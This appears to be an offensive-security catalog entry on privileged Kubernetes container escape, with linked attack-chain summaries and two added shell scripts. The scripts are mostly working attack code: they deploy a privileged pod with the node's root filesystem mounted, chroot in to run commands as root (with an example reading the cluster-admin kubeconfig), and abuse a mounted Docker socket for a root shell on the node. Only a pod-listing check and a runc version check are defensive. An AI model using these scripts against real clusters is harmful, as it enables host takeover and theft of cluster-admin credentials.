Privileged Container Escape
spec.containers[].securityContext.privileged: true — mount the host filesystem and chroot in.
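The manifest and commands behind that one-line description, as an added example (not the catalog's own tooling): a privileged pod pinned to a chosen node with the node's root filesystem at /host, then a command run inside `chroot /host`. The pod name `esc`, the image `alpine:3.19`, the namespace and node names, and the kubeadm path `/etc/kubernetes/admin.conf` are assumptions; `render_privileged_pod`, `escape_to_node` and `list_privileged_pods` are hypothetical helpers. It assumes kubectl is authenticated with pod-create rights in the namespace and that no admission control blocks privileged pods there.

```shell
#!/bin/sh
# Added example, not the catalog's own code. Assumes kubectl is authenticated
# with pod-create rights in $ns and that no admission control (e.g. Pod Security
# Admission "baseline"/"restricted") blocks privileged pods in that namespace.
set -eu

# Print a manifest for a privileged pod pinned to $node with the node's root
# filesystem mounted at /host. hostPID is set so nsenter into PID 1 works as an
# alternative to chroot; the blanket toleration lets it land on tainted
# control-plane nodes. $image defaults to a constructed alpine tag.
render_privileged_pod() {
  name="$1"; node="$2"; image="${3:-alpine:3.19}"
  cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: ${name}
spec:
  nodeName: ${node}
  hostPID: true
  restartPolicy: Never
  tolerations:
  - operator: Exists
  containers:
  - name: esc
    image: ${image}
    command: ["sleep", "3600"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
EOF
}

# Apply the pod, wait until it is Ready, then execute "$@" inside a chroot of
# the node's root filesystem, i.e. as root on the node.
escape_to_node() {
  ns="$1"; name="$2"; node="$3"; shift 3
  render_privileged_pod "$name" "$node" | kubectl -n "$ns" apply -f -
  kubectl -n "$ns" wait --for=condition=Ready "pod/$name" --timeout=120s
  kubectl -n "$ns" exec "$name" -- chroot /host "$@"
}

# Defender's view of the same field: one line per pod, with the privileged
# value of each container; only pods with at least one "true" are printed.
list_privileged_pods() {
  kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}/{.metadata.name}{"\t"}{.spec.containers[*].securityContext.privileged}{"\n"}{end}' \
    | grep -w true || true
}

# Example run on a kubeadm cluster, where the control-plane node holds the
# cluster-admin kubeconfig (path is the kubeadm default; other distributions differ):
#   escape_to_node default esc control-plane-1 cat /etc/kubernetes/admin.conf
```

`privileged: true` on its own is enough to reach the host (the container can see the node's block devices under /dev and mount the root partition itself); the hostPath volume only removes that step. `list_privileged_pods` reads the same field back across every namespace, which is the check to run before anyone else does.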
§ Where this technique fits
K-PRIV-CONTAINER is catalogued under the Privilege Escalation tactic of the offensive-security kill-chain. It appears in 4 approved dossiers in the registry, at step 3.8 on average.
§ Dossiers chaining this technique
- step 3 / 7
Privileged pod escape → cluster admin
Update/patch rights on a Deployment in the kube-system namespace let you roll out a privileged pod; the pod mounts the host filesystem and steals a cluster-admin kubeconfig from the node.
- step 3 / 6
Docker socket exposed in pod → host root
A workload mounts /var/run/docker.sock for convenience; through the socket, spawn a privileged container with the host root mounted, then chroot in for root on the node.
- step 4 / 5
CVE-2024-21626 (Leaky Vessels) → container escape
runc 1.1.11 and earlier leaks an open file descriptor for a host directory into the container process; a malicious image sets its working directory to /proc/self/fd/<N> (WORKDIR during 'docker build', process.cwd during 'docker run') and gets a handle into the host filesystem.
- step 5 / 6
ArgoCD weak RBAC → cluster admin via custom Application
ArgoCD installed with the default admin user and broad RBAC. The attacker creates an Application pointing at attacker-controlled manifests, and ArgoCD syncs them with the cluster-admin rights of its own application controller.
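The second and third dossiers above, as an added example that is not the catalog's or any project's code: the Docker-socket variant of the same host-root-plus-chroot escape, and a pre-flight check for the runc versions CVE-2024-21626 affects (below 1.1.12). `docker_sock_probe` assumes curl in the pod, `docker_sock_escape` assumes the docker CLI; `version_lt` and `runc_vulnerable_to_leaky_vessels` are hypothetical helpers and `alpine:3.19` is a placeholder image.

```shell
#!/bin/sh
# Added example, not the catalog's own code. Assumes the pod has
# /var/run/docker.sock mounted and, for docker_sock_escape, a docker CLI.
set -eu

# Confirm the socket answers before doing anything with it (no docker CLI
# needed; a /version reply means the daemon is reachable from this pod).
docker_sock_probe() {
  curl -s --unix-socket /var/run/docker.sock http://localhost/version
}

# Ask the node's own daemon for a privileged container that shares the host
# PID namespace and has the host root at /host, then chroot into it. The shell
# that comes back is root on the node.
docker_sock_escape() {
  docker -H unix:///var/run/docker.sock run --rm -it --privileged --pid=host \
    -v /:/host alpine:3.19 chroot /host /bin/sh
}

# Returns 0 (true) when dotted version $1 is strictly lower than $2. Missing
# components count as 0, so "1.1" < "1.1.12".
version_lt() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, "."); m = split(b, y, ".");
    k = (n > m) ? n : m;
    for (i = 1; i <= k; i++) {
      p = x[i] + 0; q = y[i] + 0;
      if (p < q) exit 0;
      if (p > q) exit 1;
    }
    exit 1;   # equal is not "less than"
  }'
}

# Takes the first line of `runc --version` (or a bare version string) and
# returns 0 when that runc still carries CVE-2024-21626, i.e. is below 1.1.12.
runc_vulnerable_to_leaky_vessels() {
  v=$(printf '%s\n' "$1" | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' | head -n1)
  [ -n "$v" ] && version_lt "$v" 1.1.12
}

# Example, run on the node (runc is not in the pod), e.g. from the chroot above:
#   runc_vulnerable_to_leaky_vessels "$(runc --version 2>/dev/null | head -n1)" \
#     && echo "runc below 1.1.12: CVE-2024-21626 applies"
```

Leaky Vessels is a runtime bug, not a pod-spec bug: it needs neither `privileged: true` nor a mounted socket, so the version check is worth running on every node once you are on one, not only on the node you escaped from.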
§ What commonly comes next
- 01 hostPath Volume Mount (K-HOSTPATH-MOUNT · Privilege Escalation), seen 4×